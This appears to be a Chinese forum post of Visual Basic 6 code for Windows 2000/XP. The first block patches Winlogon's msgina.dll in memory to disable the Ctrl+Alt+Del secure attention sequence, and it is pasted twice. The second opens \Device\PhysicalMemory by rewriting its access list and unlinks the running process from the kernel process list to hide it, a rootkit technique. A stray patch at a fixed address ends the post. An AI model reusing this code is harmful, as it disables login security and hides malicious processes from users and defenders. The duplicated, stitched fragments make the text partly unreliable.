思路:修改Winlogon进程中Msgina.dll导出的WlxLoggedOnSAS函数里的一个跳转指令。
跳转指令的偏移可以反汇编Msgina.dll的WlxLoggedOnSAS或用SoftIce跟踪出来。以下源码在WinXP Professional SP1, Win2000 Professional SP3,SP4 运行通过:Option Explicit
Private Const PROCESS_ALL_ACCESS = &H1F0FFF
Private Const SE_DEBUG_NAME = "SeDebugPrivilege"Private Type LUID
UsedPart As Long
IgnoredForNowHigh32BitPart As Long
End TypePrivate Type LUID_AND_ATTRIBUTES
TheLuid As LUID
Attributes As Long
End TypePrivate Type TOKEN_PRIVILEGES
PrivilegeCount As Long
TheLuid As LUID
Attributes As Long
End TypePrivate Declare Function GetLastError Lib "kernel32" () As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Sub SetLastError Lib "kernel32" (ByVal dwErrCode As Long)
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As LongPrivate Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As LongPrivate m_BuildNumber As Long
Private Sub AdjustToken() '********************************************************************
'* This procedure sets the proper privileges to allow a log off or a
'* shut down to occur under Windows NT.
'******************************************************************** Const TOKEN_ADJUST_PRIVILEGES = &H20
Const TOKEN_QUERY = &H8
Const SE_PRIVILEGE_ENABLED = &H2 Dim hdlProcessHandle As Long
Dim hdlTokenHandle As Long
Dim tmpLuid As LUID
Dim tkp As TOKEN_PRIVILEGES
Dim tkpNewButIgnored As TOKEN_PRIVILEGES
Dim lBufferNeeded As Long 'Set the error code of the last thread to zero using the
'SetLast Error function. Do this so that the GetLastError
'function does not return a value other than zero for no
'apparent reason.
SetLastError 0 'Use the GetCurrentProcess function to set the hdlProcessHandle
'variable.
hdlProcessHandle = GetCurrentProcess() If GetLastError <> 0 Then
MsgBox "GetCurrentProcess error==" & GetLastError
End If OpenProcessToken hdlProcessHandle, _
(TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY), hdlTokenHandle If GetLastError <> 0 Then
MsgBox "OpenProcessToken error==" & GetLastError
End If 'Get the LUID for shutdown privilege
LookupPrivilegeValue "", SE_DEBUG_NAME, tmpLuid If GetLastError <> 0 Then
MsgBox "LookupPrivilegeValue error==" & GetLastError
End If tkp.PrivilegeCount = 1 ' One privilege to set
tkp.TheLuid = tmpLuid
tkp.Attributes = SE_PRIVILEGE_ENABLED 'Enable the shutdown privilege in the access token of this process
AdjustTokenPrivileges hdlTokenHandle, _
False, _
tkp, _
Len(tkpNewButIgnored), _
tkpNewButIgnored, _
lBufferNeeded If GetLastError <> 0 Then
MsgBox "AdjustTokenPrivileges error==" & GetLastError
End If End SubPrivate Sub DisableHotKey(PId As Long, Optional bDisabled As Boolean = True)
Dim hHandle As Long, hFunAddr As Long
Dim hTagAddr As Long
Dim lpBuffer(1) As Byte
Dim hProcess As Long
On Error GoTo errhandle hHandle = GetModuleHandle("msgina.dll")
If hHandle = 0 Then
hHandle = LoadLibrary("msgina.dll")
If hHandle = 0 Then Exit Sub
End If
hFunAddr = GetProcAddress(hHandle, "WlxLoggedOnSAS")
If hFunAddr = 0 Then
FreeLibrary hHandle
Exit Sub
End If
If m_BuildNumber = 2195 Then
hTagAddr = hFunAddr + &HDE&
ElseIf m_BuildNumber = 2600 Then
hTagAddr = hFunAddr + &HE6&
End If
Debug.Print Hex(hHandle), Hex(hFunAddr), Hex(hTagAddr)
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, PId)
If hProcess = 0 Then
Call AdjustToken
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, PId)
End If
ReadProcessMemory hProcess, ByVal hTagAddr, lpBuffer(0), 2, 0
If bDisabled Then
lpBuffer(0) = &H74 'JE
Else
lpBuffer(0) = &H75 'JNE
End If
WriteProcessMemory hProcess, ByVal hTagAddr, lpBuffer(0), 2, 0
CloseHandle hProcess
Exit Sub
errhandle: MsgBox Err.Description
End Sub
Private Sub Command1_Click()
On Error GoTo errhandle If m_BuildNumber <> 0 Then
DisableHotKey CLng(Text1.Text), CBool(Check1.Value)
End If
Exit Sub
errhandle:
MsgBox Err.Description
End SubPrivate Sub GetWinVersion()
Dim OSInfo As OSVERSIONINFO, PId As String
Dim Ret As Long, strRet As String
OSInfo.dwOSVersionInfoSize = Len(OSInfo)
Ret = GetVersionEx(OSInfo)
If Ret = 0 Then MsgBox "Error Getting Version Information": Exit Sub
If OSInfo.dwPlatformId = 2 Then
m_BuildNumber = OSInfo.dwBuildNumber
End If
End SubPrivate Sub Form_Load()
GetWinVersion
End Sub
跳转指令的偏移可以反汇编Msgina.dll的WlxLoggedOnSAS或用SoftIce跟踪出来。以下源码在WinXP Professional SP1, Win2000 Professional SP3,SP4 运行通过:Option Explicit
Private Const PROCESS_ALL_ACCESS = &H1F0FFF
Private Const SE_DEBUG_NAME = "SeDebugPrivilege"Private Type LUID
UsedPart As Long
IgnoredForNowHigh32BitPart As Long
End TypePrivate Type LUID_AND_ATTRIBUTES
TheLuid As LUID
Attributes As Long
End TypePrivate Type TOKEN_PRIVILEGES
PrivilegeCount As Long
TheLuid As LUID
Attributes As Long
End TypePrivate Declare Function GetLastError Lib "kernel32" () As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long
Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Private Declare Sub SetLastError Lib "kernel32" (ByVal dwErrCode As Long)
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As LongPrivate Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As LongPrivate m_BuildNumber As Long
Private Sub AdjustToken() '********************************************************************
'* This procedure sets the proper privileges to allow a log off or a
'* shut down to occur under Windows NT.
'******************************************************************** Const TOKEN_ADJUST_PRIVILEGES = &H20
Const TOKEN_QUERY = &H8
Const SE_PRIVILEGE_ENABLED = &H2 Dim hdlProcessHandle As Long
Dim hdlTokenHandle As Long
Dim tmpLuid As LUID
Dim tkp As TOKEN_PRIVILEGES
Dim tkpNewButIgnored As TOKEN_PRIVILEGES
Dim lBufferNeeded As Long 'Set the error code of the last thread to zero using the
'SetLast Error function. Do this so that the GetLastError
'function does not return a value other than zero for no
'apparent reason.
SetLastError 0 'Use the GetCurrentProcess function to set the hdlProcessHandle
'variable.
hdlProcessHandle = GetCurrentProcess() If GetLastError <> 0 Then
MsgBox "GetCurrentProcess error==" & GetLastError
End If OpenProcessToken hdlProcessHandle, _
(TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY), hdlTokenHandle If GetLastError <> 0 Then
MsgBox "OpenProcessToken error==" & GetLastError
End If 'Get the LUID for shutdown privilege
LookupPrivilegeValue "", SE_DEBUG_NAME, tmpLuid If GetLastError <> 0 Then
MsgBox "LookupPrivilegeValue error==" & GetLastError
End If tkp.PrivilegeCount = 1 ' One privilege to set
tkp.TheLuid = tmpLuid
tkp.Attributes = SE_PRIVILEGE_ENABLED 'Enable the shutdown privilege in the access token of this process
AdjustTokenPrivileges hdlTokenHandle, _
False, _
tkp, _
Len(tkpNewButIgnored), _
tkpNewButIgnored, _
lBufferNeeded If GetLastError <> 0 Then
MsgBox "AdjustTokenPrivileges error==" & GetLastError
End If End SubPrivate Sub DisableHotKey(PId As Long, Optional bDisabled As Boolean = True)
Dim hHandle As Long, hFunAddr As Long
Dim hTagAddr As Long
Dim lpBuffer(1) As Byte
Dim hProcess As Long
On Error GoTo errhandle hHandle = GetModuleHandle("msgina.dll")
If hHandle = 0 Then
hHandle = LoadLibrary("msgina.dll")
If hHandle = 0 Then Exit Sub
End If
hFunAddr = GetProcAddress(hHandle, "WlxLoggedOnSAS")
If hFunAddr = 0 Then
FreeLibrary hHandle
Exit Sub
End If
If m_BuildNumber = 2195 Then
hTagAddr = hFunAddr + &HDE&
ElseIf m_BuildNumber = 2600 Then
hTagAddr = hFunAddr + &HE6&
End If
Debug.Print Hex(hHandle), Hex(hFunAddr), Hex(hTagAddr)
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, PId)
If hProcess = 0 Then
Call AdjustToken
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, PId)
End If
ReadProcessMemory hProcess, ByVal hTagAddr, lpBuffer(0), 2, 0
If bDisabled Then
lpBuffer(0) = &H74 'JE
Else
lpBuffer(0) = &H75 'JNE
End If
WriteProcessMemory hProcess, ByVal hTagAddr, lpBuffer(0), 2, 0
CloseHandle hProcess
Exit Sub
errhandle: MsgBox Err.Description
End Sub
Private Sub Command1_Click()
On Error GoTo errhandle If m_BuildNumber <> 0 Then
DisableHotKey CLng(Text1.Text), CBool(Check1.Value)
End If
Exit Sub
errhandle:
MsgBox Err.Description
End SubPrivate Sub GetWinVersion()
Dim OSInfo As OSVERSIONINFO, PId As String
Dim Ret As Long, strRet As String
OSInfo.dwOSVersionInfoSize = Len(OSInfo)
Ret = GetVersionEx(OSInfo)
If Ret = 0 Then MsgBox "Error Getting Version Information": Exit Sub
If OSInfo.dwPlatformId = 2 Then
m_BuildNumber = OSInfo.dwBuildNumber
End If
End SubPrivate Sub Form_Load()
GetWinVersion
End Sub
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HANDLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4Private Type IO_STATUS_BLOCK
Status As Long
Information As Long
End TypePrivate Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End TypePrivate Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HANDLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDescriptor As Long
SecurityQualityOfService As Long
End TypePrivate Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End TypePrivate Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End EnumPrivate Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End EnumPrivate Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End EnumPrivate Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End EnumPrivate Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End TypePrivate Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End TypePrivate Type AceArray
List() As EXPLICIT_ACCESS
End TypePrivate Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End EnumPrivate Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _
ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDescriptor As Long) As Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Dim aByte(3) As Byte
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS
GetSecurityInfo hSection, SE_KERNEL_OBJECT, _
DACL_SECURITY_INFORMATION, _
0, 0, pDacl, 0, pSD
ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar SetEntriesInAcl 1, ea, pDacl, pNewDacl
SetSecurityInfo hSection, SE_KERNEL_OBJECT, _
DACL_SECURITY_INFORMATION, _
0, 0, ByVal pNewDacl, 0
CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub
Private Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES
RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
Attributes.Length = Len(Attributes)
Attributes.RootDirectory = 0
Attributes.ObjectName = VarPtr(PhysmemString)
Attributes.Attributes = 0
Attributes.SecurityDescriptor = 0
Attributes.SecurityQualityOfService = 0
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
If Status = STATUS_ACCESS_DENIED Then
Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
SetPhyscialMemorySectionCanBeWrited g_hMPM
CloseHandle g_hMPM
Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
End If
If Status = 0 Then
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, &H30000, &H1000)
If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
End If
End FunctionPrivate Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
Dim lTemp As Long
VAddr = addr
CopyMemory aByte(0), VAddr, 4
lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))
PGDE = BaseAddress + lTemp * 4
CopyMemory PGDE, ByVal PGDE, 4
If (PGDE And 1) <> 0 Then
lTemp = PGDE And &H80
If lTemp <> 0 Then
PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
Else
PGDE = MapViewOfFile(g_hMPM, 4, 0, _
PGDE And &HFFFFF000, _
&H1000)
lTemp = (VAddr And &H3FF000) / (2 ^ 12)
PTE = PGDE + lTemp * 4
CopyMemory PTE, ByVal PTE, 4
If (PTE And 1) <> 0 Then
PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
UnmapViewOfFile PGDE
End If
End If
End If
LinearToPhys = PAddrEnd Function
Private Function GetData(addr As Long) As Long
Dim phys As Long, tmp As Long, ret As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, 4, 0, _
phys And &HFFFFF000, &H1000)
If tmp <> 0 Then
ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
CopyMemory ret, ByVal ret, 4
UnmapViewOfFile tmp
GetData = ret
End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
Dim phys As Long, tmp As Long, x As Long
phys = LinearToPhys(g_pMapPhysicalMemory, addr)
tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, _
phys And &HFFFFF000, &H1000)
If tmp <> 0 Then
x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
CopyMemory ByVal x, data, 4
UnmapViewOfFile tmp
SetData = True
End If
End Function
Private Function ByteArrToLong(inByte() As Byte) As Double
Dim I As Integer
For I = 0 To 3
ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
Next I
End FunctionPrivate Sub Command1_Click()
Dim thread As Long, process As Long, fw As Long, bw As Long
Dim strInfo As String If OpenPhysicalMemory <> 0 Then
thread = GetData(&HFFDFF124)
strInfo = "thread: &H" & Hex(thread) & vbCrLf process = GetData(thread + &H22C)
strInfo = strInfo & "process: &H" & Hex(process) & vbCrLf
fw = GetData(process + &HA0)
strInfo = strInfo & "fw: &H" & Hex(fw) & vbCrLf bw = GetData(process + &HA4)
strInfo = strInfo & "bw: &H" & Hex(bw) & vbCrLf SetData fw + 4, bw
SetData bw, fw
MsgBox strInfo
CloseHandle g_hMPM
End If
End Sub
lpBuffer(0) = &H0F
lpBuffer(1) = &H85
WriteProcessMemory hProcess, ByVal &H101876C, lpBuffer(0), 2, 0
本想再贴个SP4的,家里的Win2K Advanced SP4可以,可惜公司的Win2K Professional SP4不行,罢了...